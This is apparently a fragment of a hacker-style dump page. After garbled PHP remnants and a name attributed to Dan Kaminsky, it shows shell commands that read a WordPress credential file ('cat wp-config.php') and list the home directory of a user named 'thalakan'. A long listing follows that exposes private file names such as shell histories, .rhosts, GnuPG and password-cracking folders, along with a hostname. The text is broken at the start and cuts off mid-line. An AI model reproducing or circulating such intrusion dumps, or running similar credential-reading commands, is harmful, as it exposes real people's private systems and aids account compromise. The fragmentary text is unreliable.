index_old.php
/ Dan "Effugas" Kaminsky "; } ?>"; } ?>
$ cat wp-config.php $ cd /home/thalakan $ ls -la total 7102326 -rw-r--r-- 1 thalakan thalakan 105677 Nov 1 2004 OAgOA -rw-r--r-- 1 thalakan thalakan 1 Nov 2 2007 #64014# -rw-r--r-- 1 thalakan thalakan 1025 Nov 20 2004 #align.c# -rwxr-xr-x 1 thalakan thalakan 3644 Oct 22 2008 #automat.py# -rw-r--r-- 1 thalakan thalakan 20 May 5 2005 #c1.pl# -rw-r--r-- 1 thalakan thalakan 0 Mar 7 2007 #commute.txt# -rw-r--r-- 1 thalakan thalakan 34 Mar 4 12:40 #hsqualgm.txt# -rw-r--r-- 1 thalakan thalakan 19 Nov 27 2006 #test.awk# -rw-r--r-- 1 thalakan thalakan 206 May 3 2006 #test22.c# -rwxrwxrwx 1 thalakan thalakan 2675 Nov 15 2005 %backup%~ drwxr-x--- 141 thalakan thalakan 26112 Jul 20 09:10 . lrwxr-xr-x 1 thalakan thalakan 54 Mar 4 12:38 .#hsqualgm.txt -> thalakan at shaitan1.lightconsulting.com.49893:1201029435 drwxr-xr-x 73 root wheel 1536 Jun 26 04:56 .. -rw-r--r-- 1 thalakan thalakan 1527 May 21 2003 ..\homework7\homework7.zip drwx------ 3 thalakan thalakan 512 Apr 21 2006 .BitchX drwxr-xr-x 8 thalakan thalakan 512 Dec 11 2004 .Mathematica -rw------- 1 thalakan thalakan 53 Jul 5 2007 .Xauthority -rw------- 1 thalakan thalakan 24 Dec 7 2008 .aspell.en.prepl -rw------- 1 thalakan thalakan 22 Dec 7 2008 .aspell.en.pws -rw------- 1 thalakan thalakan 9368 Jun 26 04:54 .bash_history -rw-r--r-- 1 thalakan thalakan 46 Sep 8 2003 .bitchxrc -rw-r--r-- 1 thalakan thalakan 820 Jun 22 2006 .cshrc -rw------- 1 thalakan thalakan 53 Aug 26 2005 .cvspass lrwxr-xr-x 1 root wheel 18 Jan 24 2002 .emacs -> jrstools/dot-emacs drwx------ 3 thalakan thalakan 512 Jan 25 2002 .emacs.d drwx------ 2 thalakan thalakan 512 Jan 28 2008 .eshell -rw-r--r-- 1 thalakan thalakan 683 Mar 17 2005 .fonts.cache-1 -rw-r--r-- 1 thalakan thalakan 98 Jan 24 2002 .forward.off drwx------ 3 thalakan thalakan 512 Mar 3 2005 .gaim drwx------ 3 thalakan thalakan 512 Mar 3 2005 .gconf drwx------ 2 thalakan thalakan 512 Mar 3 2005 .gconfd drwx------ 2 thalakan thalakan 512 Mar 3 2005 .gnome drwx------ 3 thalakan thalakan 512 Mar 3 2005 .gnome2 drwx------ 2 thalakan thalakan 512 Mar 3 2005 .gnome2_private drwx------ 2 thalakan thalakan 512 Jun 4 11:16 .gnupg -rw------- 1 thalakan thalakan 137061 Jul 18 23:44 .history -rw-r--r-- 1 thalakan thalakan 17 Jun 20 2007 .htaccess -rw-r--r-- 1 thalakan thalakan 1949 Apr 18 2006 .htcfg drwxr-xr-x 2 thalakan thalakan 512 Mar 4 2005 .idapro drwx------ 3 thalakan thalakan 512 May 26 2008 .irssi -rw------- 1 thalakan thalakan 326 Nov 14 2002 .ispell_english drwx------ 2 thalakan thalakan 512 Jul 26 2006 .john drwx------ 2 thalakan thalakan 512 Jan 30 2004 .keychain -rw------- 1 thalakan thalakan 922 Jul 17 12:58 .lesshst drwx------ 2 thalakan thalakan 512 Jun 4 01:09 .links -rw-r--r-- 1 thalakan thalakan 255 Jan 24 2002 .login -rw-r--r-- 1 thalakan thalakan 160 Jan 24 2002 .login_conf drwx------ 3 thalakan thalakan 512 Jan 24 2002 .loki drwx------ 3 thalakan thalakan 512 Jan 24 2002 .loki.bak -rw------- 1 thalakan thalakan 17238 Dec 12 2004 .lsof_shaitan -rw------- 1 thalakan thalakan 371 Jan 24 2002 .mail_aliases -rw-r--r-- 1 thalakan thalakan 32 Sep 24 2002 .mailcap -rw-r--r-- 1 thalakan thalakan 331 Jan 24 2002 .mailrc -rw-r--r-- 1 thalakan thalakan 8750 Jul 15 2005 .mairixrc drwxr-xr-x 3 thalakan thalakan 512 Feb 21 2005 .mozilla drwx------ 2 thalakan thalakan 512 Mar 26 2005 .msf drwx------ 2 thalakan thalakan 512 Sep 20 2002 .mutella drwxr-xr-x 2 thalakan thalakan 512 Dec 3 2006 .muttcache lrwxr-xr-x 1 thalakan wheel 19 Jan 24 2002 .muttrc -> jrstools/dot-muttrc -rw-r--r-- 1 thalakan thalakan 0 Jan 24 2002 .muttrc-local -rw------- 1 thalakan thalakan 22736 Feb 22 19:04 .mysql_history -rw------- 1 thalakan thalakan 9010 Dec 12 2004 .nessusrc drwxr-xr-x 3 thalakan thalakan 512 Apr 14 2006 .paypal.com -rw-r--r-- 1 thalakan thalakan 1369 Sep 11 2007 .plan -rw-r--r-- 1 thalakan thalakan 1348 Dec 19 2002 .plan~ lrwxr-xr-x 1 root wheel 23 Jan 24 2002 .procmailrc -> jrstools/dot-procmailrc -rw-r--r-- 1 thalakan thalakan 789 Jan 24 2002 .profile drwx------ 2 thalakan thalakan 1024 Sep 28 2007 .razor -rw-r--r-- 1 thalakan thalakan 15 Mar 10 2003 .razor.lst -rw------- 1 thalakan thalakan 276 Jan 24 2002 .rhosts -rw------- 1 root thalakan 1024 Dec 12 2004 .rnd -rw------- 1 thalakan thalakan 385 Jul 2 2002 .rpmmacros -rw------- 1 thalakan thalakan 52